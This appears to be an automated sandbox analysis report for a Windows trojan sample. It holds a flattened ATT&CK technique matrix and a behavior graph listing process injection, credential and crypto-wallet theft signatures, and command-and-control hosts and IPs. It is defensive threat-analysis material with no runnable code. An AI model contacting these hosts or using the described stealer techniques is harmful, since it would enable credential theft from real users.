              Screen Capture              		1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Extra Window Memory Injection              		NTDS35
              System Information Discovery              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading              		LSA Secrets11
              Security Software Discovery              		SSHKeylogging14
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items411
              Process Injection              		DCSync12
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              System Owner/User Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1610535 Sample: SecuriteInfo.com.Trojan.Inj... Startdate: 09/02/2025 Architecture: WINDOWS Score: 100 35 safewat.pro 2->35 37 t.me 2->37 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 5 other signatures 2->57 9 SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe 2->9         started        signatures3 process4 signatures5 59 Writes to foreign memory regions 9->59 61 Allocates memory in foreign processes 9->61 63 Injects a PE file into a foreign processes 9->63 12 BitLockerToGo.exe 43 9->12         started        process6 dnsIp7 45 safewat.pro 5.75.215.154, 443, 49738, 49739 HETZNER-ASDE Germany 12->45 47 t.me 149.154.167.99, 443, 49737 TELEGRAMRU United Kingdom 12->47 49 127.0.0.1 unknown unknown 12->49 29 C:\ProgramData\srq9h\wtjw4e, PE32+ 12->29 dropped 65 Attempt to bypass Chrome Application-Bound Encryption 12->65 67 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->67 69 Found many strings related to Crypto-Wallets (likely being stolen) 12->69 71 5 other signatures 12->71 17 chrome.exe 12->17         started        20 cmd.exe 1 12->20         started        file8 signatures9 process10 dnsIp11 31 192.168.2.4, 138, 443, 49158 unknown unknown 17->31 33 239.255.255.250 unknown Reserved 17->33 22 chrome.exe 17->22         started        25 conhost.exe 20->25         started        27 timeout.exe 1 20->27         started        process12 dnsIp13 39 plus.l.google.com 142.250.185.142, 443, 56050 GOOGLEUS United States 22->39 41 play.google.com 142.250.185.238, 443, 56053 GOOGLEUS United States 22->41 43 2 other IPs or domains 22->43

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.